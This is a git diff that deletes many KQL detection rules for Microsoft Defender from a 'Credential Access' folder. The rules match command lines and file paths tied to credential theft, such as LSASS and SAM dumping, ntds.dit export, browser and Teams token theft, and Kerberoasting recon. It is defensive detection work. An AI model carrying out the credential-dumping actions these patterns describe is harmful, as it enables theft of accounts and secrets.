-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "ntds.dit"
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql b/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql
deleted file mode 100644
index e4c7f6cf..00000000
--- a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith ""))
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql b/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 82bd459b..00000000
--- a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/11
-// Level: high
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\"))
\ No newline at end of file
diff --git a/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql b/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql
deleted file mode 100644
index ab57a2e4..00000000
--- a/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext"
\ No newline at end of file
diff --git a/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql b/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql
deleted file mode 100644
index 4a27d643..00000000
--- a/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/03
-// Level: medium
-// Description: Detects usage of "cmdkey.exe" to add generic credentials.
-As an example, this can be used before connecting to an RDP session via command line interface.
-
-// Tags: attack.credential_access, attack.t1003.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql b/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
deleted file mode 100644
index fb03775e..00000000
--- a/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kutepov Anton, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql b/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql
deleted file mode 100644
index fc358165..00000000
--- a/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/07/04
-// Level: high
-// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe"
\ No newline at end of file
diff --git a/Credential Access/PUA_-_Mouse_Lock_Execution.kql b/Credential Access/PUA_-_Mouse_Lock_Execution.kql
deleted file mode 100644
index cad3d884..00000000
--- a/Credential Access/PUA_-_Mouse_Lock_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cian Heasley
-// Date: 2020/08/13
-// Level: medium
-// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceProcessEvents
-| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/Credential Access/PUA_-_WebBrowserPassView_Execution.kql b/Credential Access/PUA_-_WebBrowserPassView_Execution.kql
deleted file mode 100644
index 09a3fc49..00000000
--- a/Credential Access/PUA_-_WebBrowserPassView_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: medium
-// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
-// Tags: attack.credential_access, attack.t1555.003
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe"
\ No newline at end of file
diff --git a/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql b/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql
deleted file mode 100644
index 0d6a0ceb..00000000
--- a/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: medium
-// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone")
\ No newline at end of file
diff --git a/Credential Access/PktMon.EXE_Execution.kql b/Credential Access/PktMon.EXE_Execution.kql
deleted file mode 100644
index 6b203914..00000000
--- a/Credential Access/PktMon.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/17
-// Level: medium
-// Description: Detects execution of PktMon, a tool that captures network packets.
-// Tags: attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Browser_Data_Stealing.kql b/Credential Access/Potential_Browser_Data_Stealing.kql
deleted file mode 100644
index e03af167..00000000
--- a/Credential Access/Potential_Browser_Data_Stealing.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: medium
-// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
-Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
-Web browsers typically store the credentials in an encrypted format within a credential store.
-
-// Tags: attack.credential_access, attack.t1555.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data")
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql b/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql
deleted file mode 100644
index 8c7d33c2..00000000
--- a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/23
-// Level: high
-// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql b/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql
deleted file mode 100644
index e4ed3b9c..00000000
--- a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
-// Tags: attack.credential_access, attack.t1003
-DeviceRegistryEvents
-| where (RegistryKey contains "\\System\\CurrentControlSet\\Services" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql b/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql
deleted file mode 100644
index 374f0565..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Samir Bousseaden
-// Date: 2021/11/27
-// Level: critical
-// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
-// Tags: attack.credential_access, attack.t1003, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql b/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql
deleted file mode 100644
index 1e6f67d2..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/26
-// Level: critical
-// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
-// Tags: attack.credential_access, attack.t1003.001
-DeviceRegistryEvents
-| where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_WER.kql b/Credential Access/Potential_Credential_Dumping_Via_WER.kql
deleted file mode 100644
index 0e1eb68b..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_WER.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash , Nasreddine Bencherchali
-// Date: 2022/12/08
-// Level: high
-// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql b/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql
deleted file mode 100644
index 10980eef..00000000
--- a/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
-// Tags: attack.credential_access, attack.t1185
-DeviceProcessEvents
-| where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless"
\ No newline at end of file
diff --git a/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql b/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql
deleted file mode 100644
index 2d6086da..00000000
--- a/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/10/30
-// Level: high
-// Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.
-This way we are also able to catch cases in which the attacker has renamed the procdump executable.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.credential_access, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and ProcessCommandLine contains " ls"
\ No newline at end of file
diff --git a/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql b/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
deleted file mode 100644
index a9505cd1..00000000
--- a/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
-Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
-An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql b/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql
deleted file mode 100644
index 7fe3ec0c..00000000
--- a/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects usage of cmdkey to look for cached credentials on the system
-// Tags: attack.credential_access, attack.t1003.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql b/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql
deleted file mode 100644
index 961665a6..00000000
--- a/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: SecurityAura
-// Date: 2022/11/16
-// Level: high
-// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
-// Tags: attack.credential_access, attack.t1003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$"
\ No newline at end of file
diff --git a/Credential Access/Potential_SAM_Database_Dump.kql b/Credential Access/Potential_SAM_Database_Dump.kql
deleted file mode 100644
index e28af050..00000000
--- a/Credential Access/Potential_SAM_Database_Dump.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: high
-// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
-// Tags: attack.credential_access, attack.t1003.002
-DeviceFileEvents
-| where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup")
\ No newline at end of file
diff --git a/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql b/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql
deleted file mode 100644
index 7a9ae968..00000000
--- a/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, keepwatch
-// Date: 2018/11/14
-// Level: medium
-// Description: Detects service principal name (SPN) enumeration used for Kerberoasting
-// Tags: attack.credential_access, attack.t1558.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql b/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql
deleted file mode 100644
index 7f64931f..00000000
--- a/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
-// Tags: attack.credential_access, attack.t1546.008
-DeviceProcessEvents
-| where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql b/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql
deleted file mode 100644
index b4845455..00000000
--- a/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @SerkinValery
-// Date: 2022/09/16
-// Level: medium
-// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
-The database might contain authentication tokens and other sensitive information about the logged in accounts.
-
-// Tags: attack.credential_access, attack.t1528
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql b/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
deleted file mode 100644
index 5a9213f4..00000000
--- a/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
-This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1552
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-InstanceId 4624" or ProcessCommandLine contains "System[EventID=4624]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4624") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4624") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" or ProcessCommandLine contains "Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational" or ProcessCommandLine contains "Security")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/Credential Access/PowerShell_Get-Process_LSASS.kql b/Credential Access/PowerShell_Get-Process_LSASS.kql
deleted file mode 100644
index 6a75f82e..00000000
--- a/Credential Access/PowerShell_Get-Process_LSASS.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/04/23
-// Level: high
-// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
-// Tags: attack.credential_access, attack.t1552.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas"
\ No newline at end of file
diff --git a/Credential Access/PowerShell_SAM_Copy.kql b/Credential Access/PowerShell_SAM_Copy.kql
deleted file mode 100644
index acf9a4b5..00000000
--- a/Credential Access/PowerShell_SAM_Copy.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/29
-// Level: high
-// Description: Detects suspicious PowerShell scripts accessing SAM hives
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(")
\ No newline at end of file
diff --git a/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql b/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql
deleted file mode 100644
index 9feb4708..00000000
--- a/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/20
-// Level: medium
-// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
-// Tags: attack.credential_access, attack.t1552.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
